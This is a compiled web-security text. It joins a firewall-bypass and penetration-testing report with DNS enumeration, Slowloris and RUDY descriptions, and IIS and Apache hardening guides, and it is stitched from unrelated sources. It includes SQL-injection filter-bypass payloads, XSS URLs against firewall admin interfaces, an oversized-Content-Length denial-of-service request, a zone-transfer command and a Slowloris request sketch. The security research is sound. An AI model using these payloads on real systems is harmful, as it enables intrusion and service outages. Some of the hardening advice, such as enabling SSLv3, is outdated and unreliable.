The blacklist filter of phion airlock works according to a multiple keyword matching approach. If a request contains only a single quote or only an equality sign, the request is not blocked. The request is only dropped if it contains both signs at the same time. The same holds true for requests containing SQL comment signs (--, #, /*).

Besides the possibilities to bypass filtering rules that try to mitigate critical vulnerabilities like cross-site scripting, command execution and SQL injection, there are also certain areas where the filtering rules of the tested web application firewalls seem to operate in a reasonable way. The following areas tended to be hard to circumvent:

• Remote and local file inclusion (possibilities to rewrite requests that still have the same meaning are limited in this area)
• Cookie-related vulnerabilities (current web application firewalls replace all cookie contents with a single, randomly chosen cookie)

Whereas some of the blocked vulnerabilities also could not be exploited by rewriting the original requests of the perl script, it could be shown that the blacklist approach adopted by web application firewalls lacks full coverage of all possible attack vectors. Because of the huge number of different encodings, notations and possible syntaxes it is hard to cover all possible attacks. An additional problem the developers of such blacklists face is that as the coverage of attack vectors rises, the number of false positives rises as well.
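The multiple-keyword approach described above can be modeled as a boolean AND over the suspicious tokens (a simplification assumed for illustration); combined with MySQL's acceptance of comparison-free truth values, requests slip through:

```python
def phion_like_filter(request: str) -> bool:
    """Drop a request only when it contains BOTH a quote and an equals sign
    (simplified model of a multiple-keyword-matching blacklist)."""
    return "'" in request and "=" in request

assert phion_like_filter("userA' or 1=1#")    # both tokens present: dropped
assert not phion_like_filter("userA' or 1#")  # no '=': passes, yet MySQL
                                              # treats "or 1" as true
```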
A general blocking of all special characters (as these are used for command separation or syntax designation in programming languages) would prevent many vulnerabilities from being exploitable, but it would also render many web applications useless because of the high number of false positives. The conclusion of the circumvention attempts carried out by the project team can be summarized as follows: with a purely blacklist-based approach (as many web application firewalls work today) there is always a trade-off between the effectiveness of the filter mechanisms and the number of false positives (and therefore falsely blocked user requests) the operators of a web application infrastructure have to face. Even if a first exploitation attempt is blocked, 100% coverage of all encoded attacks cannot be achieved.
The following descriptions of HTTP requests have been modeled and were used for the testing efforts:

• HTTP Basic Authentication
• HTTP GET
• HTTP HEAD
• HTTP POST (formdata)
• HTTP POST (urlencoded)
• HTTP SOAP

All descriptions have been used to send data to the web server using the web application firewalls as reverse proxies. The web application firewalls therefore had to process the malformed requests.

Results

All web application firewalls have been tested using all developed descriptions during a period of three weeks. In connection with phion airlock, Breach Security ModSecurity and F5 Networks BIG-IP ASM no implementation flaws in the parsing routines could be detected. As far as Artofdefence Hyperguard is concerned, a denial of service vulnerability could be found. The vulnerability was triggered by the test cases 3465 to 3470 of the description for HTTP POST (formdata). The test cases do not lead to an immediate crash of the system but rather to high system load as far as CPU and memory usage are concerned, resulting in repeatedly unanswered requests in the range of the aforementioned test cases. To demonstrate the cause of the vulnerability, the HTTP request generated by test case 3465 is shown in the following listing:

POST /directory/anysite.jsp HTTP/1.1
Host: webapphost.com
User-Agent: Mozilla/5.0 (Windows; en-GB; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11
Accept: text/xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------103832778631715
Content-Length: 134217718

-----------------------------103832778631715
Content-Disposition: form-data; name="name"

MyName
-----------------------------103832778631715
Content-Disposition: form-data; name="param2"

value2

-----------------------------103832778631715--

As can be seen, the POST request sends form contents using valid multipart/form-data encoding. The abnormality in the shown request is the Content-Length header, which is set to an unreasonably high value that does not represent the length of the data actually sent. As far as could be determined without access to the source code of the implementation, the length value is used to allocate memory on the system. At the same time the requests lead to high CPU load if sent repeatedly. It could be observed that child processes serving the requests (and allocating the high amount of memory) are not killed immediately after the (per se too short) request is finished but persist for several seconds. By choosing a high Content-Length value and sending repeated requests an attacker is therefore able to consume significant system resources. A denial of service cannot be achieved with a single request (as long as the attacked system has enough RAM) because Artofdefence Hyperguard works as a module for the Apache web server, which discards requests with too great a length (depending on the configuration). The vulnerability can be used to provoke a kernel panic as the values for free RAM and free swap space steadily decrease to zero. Afterwards the system has to be rebooted in order to be functional again. The vulnerability was reported to the vendor on the 22nd of May 2009 using the bug tracking system. An updated version of the product is now available.

Figure 4: Successful cross-site scripting attack in Hyperguard management interface.

4.6 Conducting penetration tests
The following chapter covers the results of penetration tests that have been conducted on the web application firewall administration interfaces. Please note that the tests were only of limited scope, as they were not the main objective of the project. The tests only cover the administrative functions of the products that are normally available to administrators only (management interfaces). While testing the administrative interfaces it was found that they are not covered by the same ruleset that is applied to the web applications to be protected. In general this makes it easier to exploit discovered vulnerabilities than it would be with an additional protective ruleset. The following URL demonstrates a cross-site scripting vulnerability in the management interface of the tested version of Hyperguard (already fixed in the current release):

https://10.25.99.12:8082/adminserver/python/gwtguiserver.py/getDebug?sessioni...%3Chtml%3E%3Cbody%20onload%3dalert('xss')%3Ed=1

Figure 4 shows the vulnerability, which can for example be used to steal cookies or to phish login data with the help of an unaware user. The vulnerability only affects users of Microsoft's Internet Explorer 7 because that browser parses documents where the closing html and body tags are missing. Other browsers do not parse such documents. If the closing tags are included, the web application firewall masks the brackets and therefore stops the attack. However, there is a second cross-site scripting vulnerability in the Hyperguard management interface that is interpreted by all browsers. The vulnerability is triggered when a new user is added by an administrator. If the username contains script code, the value is printed to the user list without filtering. The impact of the vulnerability is considered low because it can only be exploited by a user that already has administrative privileges.
Nevertheless it enables an attacker to steal accounts of other administrative users with possibly higher privileges (e.g. by stealing their cookies using the cross-site scripting vulnerability). The vulnerabilities have been reported to the vendor of Hyperguard and are already fixed in the current release. The management interface of the F5 Networks BIG-IP web application firewall is also prone to a cross-site scripting vulnerability. The affected function is used to display error messages in case a request to the administration interface cannot be served successfully.
Figure 5: Successful cross-site scripting attack in BIG-IP management interface.

The error message displayed to the user is not escaped properly, enabling an attacker to insert arbitrary script code. The vulnerability can be demonstrated by accessing the following URL:

https://192.168.11.13/dms/login.php?msg_id=<script>alert(1)</script>

Figure 5 shows that the script code is executed in the context of the browser session, enabling an attacker to steal cookies, etc. At the time it was found, the vulnerability was already known to the vendor and fixed in an updated release.

The web interface of phion airlock is protected by a login that requires a valid username and the corresponding password. All users of the web interface are also system users and are able to log in via SSH, for example. The fact that users are stored as system users with the standard Solaris operating system settings leads to the situation that all passwords are truncated at 8 characters without a specific warning. This makes brute force attempts easier for an attacker, even though success is still unlikely if a good password is chosen.

phion airlock (version 4.1-10.41) is also vulnerable to a remote denial of service attack on the management network interface. This vulnerability affects all protected web servers and applications, because after exploitation the web application firewall cannot handle any further requests and must be restarted manually. No authentication is needed to conduct the denial of service, so the attack can be started by an internal attacker with access to the management network interface or via cross-site request forgery with a single HTTP GET request. The vendor describes the vulnerability as follows: "The airlock Configuration Center shows many system monitoring charts to check the system status and history. These images are generated on the fly by a CGI script, and the image size is
part of the URL parameter. Unreasonably large values for the width and height parameters will cause excessive resource consumption. Depending on the actual load and the memory available, the system will be out-of-service for some minutes or crash completely, making a reboot necessary."

After the initial reporting, further research showed that the vulnerability can also be used to execute arbitrary system commands. This allows attackers to run operating system commands under the user of the web server (uid=12359(wwwca) gid=54329(wwwca)). The vulnerability was reported on April 29th, 2009. Corresponding exploits will not be published. Both security flaws were addressed by a hotfix and were patched with airlock HF4112. The vulnerabilities are also fixed within airlock release 4.1-11.18.

Conclusion

The general impression of web application firewall technology gained during this project is that web application firewalls can indeed raise the security level of certain vulnerable applications. Nevertheless it must be clearly stated that this additional layer of defense is partly porous and does not replace the secure development and operation of web applications. It also must not be overlooked that a web application firewall is an additional device placed between the client and the web server and can therefore affect the availability of the overall system. It is also an additional system that can have vulnerabilities or other forms of implementation flaws and requires regular maintenance. Additionally, it has been shown that web application firewalls can themselves be the target of successful attacks (cross-site scripting flaws, cross-site request forgery, denial of service, command execution, etc.). When defining rules for a specific web application or modifying the standard ruleset it is very important to test the whole web application and all provided functions for correct functionality.
This can for example be done using automated testing frameworks. In the course of the project, certain functionalities of the web applications used for testing were often rendered non-functional because of predefined rules of the web application firewalls. As unexpected side effects like this can occur with every change of the rules or of the web application itself, comprehensive testing is necessary.

The use of web application firewalls can generally be recommended for virtual patching purposes. That means that between the emergence of a new and previously unknown vulnerability and the deployment of a new and tested release, possible attacks against the vulnerable application can be blocked by the web application firewall. That also gives developers and testers more time to develop a source code patch while the vulnerability is virtually patched in the meantime. Additionally, web application firewalls can also provide a baseline protection:
certain vulnerabilities of the application are protected, even if they are not yet known. An organization using web application firewalls must however be aware that these products cannot cover all vulnerability classes to the same degree. The vulnerable test applications developed in the course of this project have been used to determine which classes are covered to which degree. Whereas vulnerability classes like browser-based attacks, interpreter injection and inclusion of external content were covered in 60-70% of all cases, other classes like information disclosure or brute force are hardly handled at all. Whether the achieved percentage provides enough protection for a certain application must be decided individually for each case. Generally speaking, the protection level for the three vulnerability classes mentioned above was higher than expected. It is nevertheless advisable to invest in the secure development of web applications and not just in web application firewalls, as certain vulnerability classes can hardly be covered or require that vulnerabilities of the application to be protected are already known.
High Level Distributed Denial of Service

R-U-Dead-Yet

R-U-Dead-Yet, or RUDY for short, implements the generic HTTP DoS attack via long form field submissions. More technical details about layer-7 DDoS attacks can be found in this OWASP lecture:

This tool runs with an interactive console menu, automatically detecting forms within a given URL and allowing the user to choose which forms and form fields to use for the POST attack. In addition, the tool offers unattended execution by providing the necessary parameters within a configuration file. In version 2.x RUDY supports SOCKS proxies and session persistence using cookies when available.

The Past
Slowloris

Slowloris is a piece of software written by Robert "RSnake" Hansen which allows a single machine to take down another machine's web server with minimal bandwidth and side effects on unrelated services and ports. Slowloris tries to open many connections to the target web server and hold them open as long as possible. It accomplishes this by opening connections to the target web server and sending a partial request. Periodically, it will send subsequent HTTP headers, adding to, but never completing, the request. Affected servers will keep these connections open, filling their maximum concurrent connection pool, eventually denying additional connection attempts from clients.
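The core of the technique is simply a request whose header block is never terminated; a minimal sketch of the two payloads involved (function names are illustrative, and "victim.example" is a placeholder host):

```python
def partial_request(host: str) -> bytes:
    """Initial Slowloris payload: a request line and Host header, but
    deliberately WITHOUT the blank line that would complete the headers."""
    return b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n"

def keep_alive_header(n: int) -> bytes:
    """Sent periodically on each open socket so the server keeps waiting."""
    return b"X-a: %d\r\n" % n

# A complete header block would end in CRLF CRLF; this one never does,
# so the server holds the connection open waiting for more headers.
assert not partial_request("victim.example").endswith(b"\r\n\r\n")
```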
PyLoris: QSlowloris
Slowloris Mitigation:
Protecting DNS Servers & Detecting DNS Enumeration Attacks

The following enumeration techniques are based on the DNS protocol:

• Reverse DNS lookup
Performs a PTR request to get the host name from an IP address.

• Name server record lookup
Gets the authoritative name server for each domain enumerated on the target host.

• Mail exchange record lookup
Gets the MX records for each domain enumerated on the target host.

• DNS AXFR zone transfer
The name server that serves the target machine's domain zone can be prone to a zone transfer vulnerability. This allows an attacker to perform an AXFR zone transfer and get a dump of the complete DNS zone, i.e. all records served by this name server. The AXFR vulnerability can be checked simply with the dig utility. For example, to check the DNS server 1.2.3.4, authoritative name server for the domain foo.com, use the following syntax; if you get output like the following, the DNS server is vulnerable.

$ dig -t axfr @1.2.3.4 foo.com

; <<>> DiG 9.6.1-P2 <<>> -t axfr @1.2.3.4 foo.com
; (1 server found)
;; global options: +cmd
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800 38400
foo.com. 38400 IN NS 127.0.0.1.foo.com.
foo.com. 38400 IN MX 10 mta.foo.com.
mta.foo.com. 38400 IN A 192.168.0.3
ns1.foo.com. 38400 IN A 127.0.0.1
www.foo.com. 38400 IN A 192.168.0.2
foo.com. 38400 IN SOA ns1.foo.com. admin.foo.com. 2006081401 28800 3600 604800
38400
;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Wed Dec 23 15:27:24 2009
;; XFR size: 7 records (messages 1, bytes 207)

• Host name brute-forcing
Brute-forcing tries to guess host names on the enumerated domain that resolve to the target IP address. For example, if the domain foo.com has been enumerated, the host name brute-forcer will check for third-level names like www.foo.com, www1.foo.com, db.foo.com and whatever words are listed in the dictionary used.

• DNS TLD expansion
Brute-forces the top-level-domain part of an already enumerated domain. For example, if the domain foo.com has been enumerated, the TLD expansion (TLD brute-forcing) plugin will check different TLDs for the same domain, like foo.org, foo.net, foo.it and whatever TLDs are listed in the TLD dictionary.

SSL/TLS protocol enumeration techniques

The following enumeration technique is based on the SSL/TLS protocol:

• X.509 certificate parsing
Sometimes the target machine publishes HTTPS services. A connection is attempted to the common HTTP and HTTPS service ports and an SSL/TLS handshake is negotiated; if the remote server supplies an X.509 certificate, the host name is taken from the issuer and subject Common Name (CN) fields and from the subject alternative name extension field.

4.2.3 Passive web enumeration techniques

The following enumeration techniques are based on third-party web sites and public databases.

• Search engines
The following search engines are used:
Microsoft Bing (with and without search API): http://search.msn.com
It is suggested to use this with an API key, which improves the number of results fetched and the plugin speed.

• GPG/PGP key databases
The following public databases are used:
MIT GPG key server: http://pgp.mit.edu:11371

• DNS/WHOIS databases
Public WHOIS information databases, like RIPE, or DNS snapshot databases are used to passively enumerate host names and track their history. The following public databases are used:
DNShistory: http://dnshistory.org
Domainsdb: http://www.domainsdb.net/
Bfk.de: http://www.bfk.de/
Gigablast: http://www.gigablast.com
Netcraft: http://searchdns.netcraft.com
Robtex: http://www.robtex.com
Tomdns: http://www.tomdns.net
Web-max: http://www.web-max.ca

Usage

You can use hostmap from the command line interface as follows:

ruby hostmap.rb OPTIONS -t TARGET

where TARGET is the IP address of the host against which you want to perform host discovery and OPTIONS is a list of hostmap's options.
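The host-name brute-forcing technique described earlier can be sketched in a few lines (the function and word list are illustrative; real tools such as hostmap use large dictionaries and many threads):

```python
import socket

def brute_subdomains(domain: str, words: list, target_ip: str) -> list:
    """Resolve word.domain for each dictionary word and keep the names
    that point at the target IP (cf. www.foo.com, db.foo.com, ...)."""
    hits = []
    for word in words:
        name = f"{word}.{domain}"
        try:
            if target_ip in socket.gethostbyname_ex(name)[2]:
                hits.append(name)
        except socket.gaierror:
            pass  # name does not resolve: not a hit
    return hits
```

A run against a real domain with a dictionary of common prefixes (www, www1, db, mail, ...) would return the resolvable third-level names pointing at the target.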
Detecting Sub Domains Using Google
Using TXDNS – dictionary

Using TXDNS – brute force

Securing Web Servers

According to research conducted by the Ponemon Institute, web hacking and web-based attacks are the most costly for companies. The research results can be seen here:
This technique relies purely on HTTP traffic to attack and penetrate web servers and application servers. It was formulated to demonstrate that having tight firewalls or SSL does not really matter when it comes to web application attacks. The premise of the one-way technique is that only valid HTTP requests are allowed in and only valid HTTP responses are allowed out of the firewall.

Components of a generic web application system

There are four components in web application systems, namely the web client, which is usually a browser, the front-end web server, the application server and, for a vast majority of applications, the database server. The following diagram shows how these components fit together.
The web application server hosts all the application logic, which may be in the form of scripts, objects or compiled binaries. The front-end web server acts as the application's interface to the outside world, receiving inputs from the web clients via HTML forms and HTTP, and delivering output generated by the application in the form of HTML pages. Internally, the application interfaces with back-end database servers to carry out transactions. The firewall is assumed to be tightly configured, allowing nothing but incoming HTTP requests and outgoing HTML replies.

Multi-tier architecture

In software engineering, multi-tier architecture (often referred to as n-tier architecture) is a client–server architecture in which the presentation, the application processing and the data management are logically separate processes. For example, an application that uses middleware to service data requests between a user and a database employs multi-tier architecture. The most widespread use of multi-tier architecture is the three-tier architecture. N-tier application architecture provides a model for developers to create flexible and reusable applications. By breaking an application up into tiers, developers only have to modify or add a specific layer, rather than rewrite the entire application. There should be a presentation tier, a business or data access tier, and a data tier. The concepts of layer and tier are often used interchangeably. However, one fairly common point of view is that there is indeed a difference: a layer is a logical structuring mechanism for
the elements that make up the software solution, while a tier is a physical structuring mechanism for the system infrastructure. This architecture ensures high security when only the presentation tier (web server) is exposed to the internet and communicates internally and securely with the next tier. In order to ensure that the defense-in-depth concept and principles are implemented, strict firewall rules and filtering mechanisms separate the communication between each tier. Another common concept to reduce the risk exposure factor is to use different platforms and operating systems in each tier, so that a probable attacker won't have a "Hack One – Hack Them All" chance. The probability of an attacker having remote code execution exploits matching the exact versions of the different operating systems in each tier is very low.

Securing Virtual Hosts – Preventing Detection of Virtual Hosts

There are two main techniques:
1. Configuring the web server to respond only to the virtual host name
2. Removing PTR records that expose subdomain names

Using Hostmap

Hostmap is a tool to enumerate all the virtual hosts and DNS names of an IP address, and to do this in the fastest and most detailed way possible. To achieve this hostmap uses a lot of techniques, some never used by any other tool, combined with development technologies to get the best performance.

Features
• DNS names and virtual host enumeration
• Multiple discovery techniques
• Results correlation, aggregation and normalization
• Multi-threaded and event-based engine
• Platform independent: hostmap can run on GNU/Linux, Microsoft Windows, Apple OSX and any system where Ruby works.

Techniques

To enumerate all the aliases of a target machine, hostmap uses a lot of techniques based on protocols, exposed services, target weaknesses, target vulnerabilities, brute-forcing techniques, public databases and search engines that can reveal a target's aliases. The data are fetched at run time from these data sources using a multi-threaded engine to speed up the fetching phase. All fetched data are aggregated, normalized and correlated, and the results are checked at run time to avoid false positives. The hostmap engine is event based: each enumeration action can yield results, and based on the type of enumeration action and the type of the results, hostmap dynamically chooses the next action to take and the next enumeration check to launch. Hostmap uses an adaptive engine written to get as many results as possible. The techniques used by hostmap are the following.

Protecting against Google Hacking

1. Keep your sensitive data off the web!
Even if you think you're only putting your data on a web site temporarily, there's a good chance that you'll either forget about it, or that a web crawler might find it. Consider more secure ways of sharing sensitive data such as SSH/SCP or encrypted email.

2. Use meta headers on non-public pages

Valid meta robots content values: Googlebot interprets the following robots meta tag values:
• NOINDEX - prevents the page from being included in the index.
• NOFOLLOW - prevents Googlebot from following any links on the page. (Note that this is different from the link-level NOFOLLOW attribute, which prevents Googlebot from following an individual link.)
• NOARCHIVE - prevents a cached copy of this page from being available in the search results.
• NOSNIPPET - prevents a description from appearing below the page in the search results, as well as prevents caching of the page.
• NOODP - blocks the Open Directory Project description of the page from being used in the description that appears below the page in the search results.
• NONE - equivalent to "NOINDEX, NOFOLLOW".

<META NAME="ROBOTS" CONTENT="NONE">

3. Googledork!
• Use the techniques outlined in this paper to check your own site for sensitive information or vulnerable files.
• Use gooscan (from http://johnny.ihackstuff.com) to scan your site for bad stuff, but first get advance express permission from Google! Without advance express permission, Google could come after you for violating their terms of service. The author is currently not aware of the exact implications of such a violation. But why anger the "Goo-Gods"?!
• Check the official googledorks website (http://johnny.ihackstuff.com) on a regular basis to keep up on the latest tricks and techniques.

4. Consider removing your private sites from Google's index.
The Google webmaster FAQ located at http://www.google.com/webmasters/ provides invaluable information about ways to properly protect and/or expose your site to Google. From that page: "Please have the webmaster for the page in question contact us with proof that he/she is indeed the webmaster. This proof must be in the form of a root level page on the site in question, requesting removal from Google. Once we receive the URL that corresponds with this root level page, we will remove the offending
page from our index." In some cases, you may want to remove individual pages or snippets from Google's index. This is also a straightforward process which can be accomplished by following the steps outlined at http://www.google.com/remove.html.

5. Use a robots.txt file.

Web crawlers are supposed to follow the robots exclusion standard found at http://www.robotstxt.org/wc/norobots.html. This standard outlines the procedure for "politely requesting" that web crawlers ignore all or part of your website. I must note that hackers may not have any such scruples, as this file is merely a suggestion. The major search engines' crawlers honor this file and its contents. For examples and suggestions for using a robots.txt file, see the above URL on robotstxt.org.

Securing IIS 7/7.5 + Microsoft SQL Server 2008

IIS Dynamic IP Restrictions Module: The mod_evasive of IIS

IIS has a module which is the exact equivalent of the well-known Apache module mod_evasive. These modules automatically detect a user's deviation from normal user activity and immediately block the user for a certain amount of time. This is very useful for blocking basic denial of service attacks and for giving a hard time to someone who is crawling/spidering your website to find hidden pages and vulnerabilities. It can be downloaded here: http://www.iis.net/download/dynamiciprestrictions

The installation is practically "Next, Next", thanks to the Web Platform Installer.
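The behavior of such modules can be modeled as a sliding-window counter per client IP (the thresholds and function names below are assumptions for illustration, not the module's actual defaults):

```python
import time
from collections import defaultdict

WINDOW_SECONDS = 1.0   # assumed observation window
MAX_REQUESTS = 20      # assumed per-window request budget

_hits = defaultdict(list)

def allow(ip: str, now: float = None) -> bool:
    """Sliding-window check in the spirit of Dynamic IP Restrictions /
    mod_evasive: deny an IP that exceeds MAX_REQUESTS per WINDOW_SECONDS."""
    now = time.monotonic() if now is None else now
    recent = [t for t in _hits[ip] if now - t < WINDOW_SECONDS]
    recent.append(now)
    _hits[ip] = recent
    return len(recent) <= MAX_REQUESTS

# A burst of 25 requests in the same instant: the first 20 pass, the rest are denied.
verdicts = [allow("203.0.113.7", now=0.0) for _ in range(25)]
```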
Hardening IIS SSL with IISCrypto – Disabling Weak Ciphers
The free IISCrypto tool can be downloaded at: https://www.nartac.com/Products/IISCrypto/Default.aspx
The IIS HTTPS (SSL) server can be hardened to support the FIPS 140-2 or PCI-DSS SSL security level in a single click!
Hardening IIS 7.5 on Windows 2008 Server R2 SP1
The default IIS 7.5 installation does not include the IIS-Metabase package, which is required for installing URLScan (current version 3.1). The IIS-Metabase package can be installed by:
CMD /C START /w PKGMGR.EXE /l:log.etw /iu:IIS-Metabase
It turns out that in IIS 7.5, URLScan will not run “out of the box” after it is installed. It must be configured to be at the bottom of the ISAPI filter chain for it to operate properly:
Then you can configure “%windir%\system32\inetsrv\urlscan\urlscan.ini” to report the server as Apache.
Redirecting all requests from HTTP to HTTPS using the IIS URL Rewrite Module is done in the following sequence:
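The HTTP-to-HTTPS redirect sequence corresponds to a web.config fragment along these lines (a sketch using the IIS URL Rewrite module; the rule name is arbitrary):

```xml
<system.webServer>
  <rewrite>
    <rules>
      <!-- Redirect every plain-HTTP request to its HTTPS equivalent -->
      <rule name="HTTP to HTTPS" stopProcessing="true">
        <match url="(.*)" />
        <conditions>
          <add input="{HTTPS}" pattern="off" />
        </conditions>
        <action type="Redirect" url="https://{HTTP_HOST}/{R:1}" redirectType="Permanent" />
      </rule>
    </rules>
  </rewrite>
</system.webServer>
```

The `{HTTPS} = off` condition keeps already-secure requests from being redirected in a loop.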
Disabling Caching of Pages (will be applied to any page under that website, so make sure you are configuring the HTTPS one):
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Adding Browser Security Related HTTP Headers:
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
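In IIS these headers can also be set declaratively instead of through the GUI; a minimal web.config sketch, with the header values copied from above:

```xml
<configuration>
  <system.webServer>
    <httpProtocol>
      <customHeaders>
        <!-- Browser security headers, as listed above -->
        <add name="X-Frame-Options" value="SAMEORIGIN" />
        <add name="X-XSS-Protection" value="1; mode=block" />
        <add name="X-Content-Type-Options" value="nosniff" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
```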
It looks like this: Finally, we can test to see how it actually reacts:
telnet <server> 80
GET / HTTP/1.0
And see:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=999999999; includeSubdomains
X-Frame-Options: deny
Access-Control-Allow-Origin: http://www.xyz.com
Access-Control-Allow-Methods: POST, GET
Access-Control-Max-Age: 99999999
Server: Apache
Date: Thu, 12 May 2011 10:46:48 GMT
Connection: close
Content-Length: 155
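The same check can be scripted: save a captured response (an abridged copy of the one above) and grep it for the security headers that were configured; the only assumptions here are the header names already shown:

```shell
# Save a captured HTTP response (abridged from the telnet session above)
cat > response.txt <<'EOF'
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Server: Apache
EOF
# Print only the browser-security headers configured earlier
grep -iE 'x-frame-options|x-xss-protection|x-content-type-options' response.txt
```

In practice you would feed the live server output (e.g. from the telnet session above) into the same grep instead of a saved file.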
1.1. URLScan – Free by Microsoft
http://www.iis.net/download/UrlScan
1.2. WebKnight – Free Host-Based Web Application Firewall
http://www.aqtronix.com/?PageID=99#Download
1.3. Dynamic IP Restrictions (Beta) – Anti DoS, DDoS and Web Crawling
http://www.iis.net/download/DynamicIPRestrictions
1.4. Advanced Logging
http://www.iis.net/download/AdvancedLogging

Securing Apache
Apache Hardening
Apache SSL Hardening:
In path: /etc/httpd/conf.d/ssl.conf
Change:
# Make sure the SSL Engine is on, especially since we need a proxy
SSLEngine on
SSLProxyEngine on
# Make sure SSL is forcefully required
SSLOptions +StrictRequire
# Only accept SSL version 3 (don’t accept SSL v2…) and TLS (which is better)
SSLProtocol -all +SSLv3 +TLSv1
SSLProxyProtocol -all +SSLv3 +TLSv1
# Only accept high security ciphers (don’t accept low, medium and null ciphers)
SSLCipherSuite HIGH
# Make the SSL seed entropy stronger
SSLRandomSeed startup file:/dev/urandom 4096
# 1024 on a slow CPU server
# 2048 on a normal CPU server
# 4096 on a fast CPU server
SSLRandomSeed connect file:/dev/urandom 2048
# Define custom logs and change the log file name to be unpredictable
CustomLog /var/log/httpd/mycompany_ssl_request_log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
# Change the default name of the log files, to make their path unpredictable
ErrorLog /var/log/httpd/mycompany_ssl_error_log
TransferLog /var/log/httpd/mycompany_ssl_access_log
LogLevel warn
# Verify the remote SSL server’s certificate validity on SSL proxy connections
SSLProxyVerify require
# Make sure there will be no Man-In-The-Middle attacks on SSL renegotiations
SSLInsecureRenegotiation off

Remove:
# This slows down the server’s performance and is mostly not required
<Files ~ "\.(cgi|shtml|phtml|php3?)$">
SSLOptions +StdEnvVars
</Files>
<Directory "/var/www/cgi-bin">
SSLOptions +StdEnvVars
</Directory>

Mod_Evasive – Anti-DoS Apache Module
# We need “apxs” to compile mod_evasive; it should be in one of the following:
/usr/local/psa/admin/bin/apxs
/usr/sbin/apxs
# If it wasn’t found, we can locate it manually
locate apxs | grep bin
# Download mod_evasive
wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
# Extract the mod_evasive source files
tar xvzf mod_evasive_1.10.1.tar.gz
# Compile mod_evasive
/usr/sbin/apxs -cia /usr/src/mod_evasive/mod_evasive20.c
# Check that mod_evasive is configured to be loaded in the Apache configuration file
grep -i evasive /etc/httpd/conf/httpd.conf
# Add the following optimized rules at the end of /etc/httpd/conf/httpd.conf:
<IfModule mod_evasive20.c>
DOSHashTableSize 3097
DOSPageCount 100
DOSSiteCount 500
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 600
</IfModule>
# Restart Apache so mod_evasive will be loaded into it on process initiation
/etc/init.d/httpd restart
# Due to application interference – disabling mod_evasive!
# Comment out the following: “Include conf/mod_evasive20.conf”

SELinux – Optional Hardening:
SELinux Apache Hardening
# Change the context of “/var/www/html” to “httpd_sys_content_t”
chcon -R -t httpd_sys_content_t /var/www/html
# Give all newly created files the same matching context type
semanage fcontext -a -t httpd_sys_content_t /var/www/html
# Change the context of “/var/log/httpd” to “httpd_log_t”
chcon -R -t httpd_log_t /var/log/httpd
# Give all newly created files the same matching context type
semanage fcontext -a -t httpd_log_t /var/log/httpd
# Enforce SELinux rules
echo 1 >/selinux/enforce
# Restarting Tomcat after SELinux:
cd /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/ && /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/shutdown.sh && /home/dominodf/home/dominodf/DigitalFuel-Tomcat/DigitalFuel-7.0/Domino_Live/startup.sh

SELinux for other services (Experts Only)
Enable hardened HTTP:
setsebool -P httpd_builtin_scripting 1
setsebool -P httpd_can_network_connect_db 1
setsebool -P httpd_can_network_connect 1
setsebool -P httpd_can_sendmail 1
setsebool -P httpd_can_network_relay 1
setsebool -P httpd_enable_cgi 1
setsebool -P httpd_enable_homedirs 1
setsebool -P allow_httpd_sys_script_anon_write 1
setsebool -P allow_httpd_anon_write 1
setsebool -P httpd_suexec_disable_trans 1
setsebool -P httpd_tty_comm 0
setsebool -P httpd_unified 0
setsebool -P httpd_enable_ftp_server 0
setsebool -P allow_httpd_bugzilla_script_anon_write 0
setsebool -P allow_httpd_mod_auth_pam 0
setsebool -P allow_httpd_nagios_script_anon_write 0
setsebool -P allow_httpd_prewikka_script_anon_write 0
setsebool -P allow_httpd_squid_script_anon_write 0
setsebool -P httpd_disable_trans 1
setsebool -P httpd_rotatelogs_disable_trans 1
setsebool -P httpd_ssi_exec 0
setsebool -P httpd_use_cifs 0
setsebool -P httpd_use_nfs 0

Limiting Flash, Java & JavaScript
http://flash.melameth.com/togflash.msi
Email protection & filtering
 Disable inbound spoofing
Sending Spoofed Emails – Bypassing SPF with an $8 Domain
 Attachment filtering by content type and extension detection & matching
 Using multiple anti-virus engines
 Consider domain whitelisting by manual moderation
VPN Security
Identifying VPNs & Firewalls (Fingerprinting VPNs)
In the last decade, Virtual Private Networks (VPNs) became the most commonly deployed solution for users working remotely. Providing the user a full, remote, network-level connection to the company’s LAN is extremely dangerous, since the LAN is known to be the organization’s “weak stomach”. However, most organizations require some people to work from home, and their field technicians and salesmen to connect to the company’s internal resources.
The alternative solution to VPN is port forwarding. This solution means opening direct access from the internet to an internal system, making it accessible and attackable by anyone. Certain internal systems, which are sometimes old or self-developed, lack the security level required for internet exposure, and opening access to such a system is too dangerous. Port forwarding also lacks the flexibility of multiple people connecting to the same port and getting redirected to different machines, for services such as Remote Desktop, where each user should be forwarded to his own local computer.
VPN solves these security risks: nothing is exposed to the internet except for the company’s VPN server, which is usually integrated into the firewall. The only risk left is hacking into the company’s LAN by attacking the VPN server itself or guessing the credentials of an authorized remote-access VPN user.
